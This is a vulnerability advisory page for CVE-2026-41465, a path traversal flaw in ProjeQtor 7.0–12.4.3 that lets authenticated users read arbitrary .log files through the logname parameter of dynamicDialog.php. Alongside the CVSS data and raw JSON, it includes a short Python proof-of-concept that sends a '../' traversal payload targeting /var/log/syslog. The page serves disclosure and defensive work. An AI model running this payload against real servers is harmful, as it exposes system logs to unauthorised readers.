Security Vulnerability Report
中文
CVE-2026-41465 CVSS 6.5 MEDIUM

CVE-2026-41465

Published: 2026-04-27 16:16:46
Last Modified: 2026-04-27 18:35:54
Source: [email protected]

Description

ProjeQtor versions 7.0 through 12.4.3 contains a path traversal vulnerability in the log file viewer at dynamicDialog.php where the logname parameter is not validated against directory traversal sequences before constructing file paths. Authenticated attackers can inject directory traversal sequences ../ into the logname parameter to read arbitrary .log files accessible to the web server process on the filesystem.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

ProjeQtor 7.0
ProjeQtor 7.1
ProjeQtor 7.2
ProjeQtor 8.0
ProjeQtor 9.0
ProjeQtor 10.0
ProjeQtor 11.0
ProjeQtor 12.0
ProjeQtor 12.1
ProjeQtor 12.2
ProjeQtor 12.3
ProjeQtor 12.4.0
ProjeQtor 12.4.1
ProjeQtor 12.4.2
ProjeQtor 12.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL configuration target_url = "http://target-address/projeqtor/dynamicDialog.php" # Attacker credentials (required as per PR:L) username = "attacker" password = "password" # Payload to read a specific log file using path traversal # Attempting to read /var/log/syslog (Linux) payload = { "logname": "../../../../../../var/log/syslog" } # Create a session to handle authentication session = requests.Session() # 1. Perform Login (Logic depends on actual form, assuming standard) # login_data = {"login": username, "password": password} # session.post(f"{target_url}/login.php", data=login_data) print(f"[*] Attempting to exploit CVE-2026-41465 on {target_url}") try: # 2. Send the malicious request response = session.get(target_url, params=payload, timeout=10) # 3. Check if the response contains log content if response.status_code == 200 and "log" in response.text.lower(): print("[+] Exploit successful! Log file content extracted:") print(response.text[:500]) # Print first 500 chars else: print("[-] Exploit failed or file not found.") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41465", "sourceIdentifier": "[email protected]", "published": "2026-04-27T16:16:45.793", "lastModified": "2026-04-27T18:35:53.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ProjeQtor versions 7.0 through 12.4.3 contains a path traversal vulnerability in the log file viewer at dynamicDialog.php where the logname parameter is not validated against directory traversal sequences before constructing file paths. Authenticated attackers can inject directory traversal sequences ../ into the logname parameter to read arbitrary .log files accessible to the web server process on the filesystem."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://damiri.fr/en/cves/CVE-2026-41465", "source": "[email protected]"}, {"url": "https://gryfman.fr/cves/CVE-2026-41465", "source": "[email protected]"}, {"url": "https://www.projeqtor.com", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/projeqtor-path-traversal-via-dynamicdialog-php", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.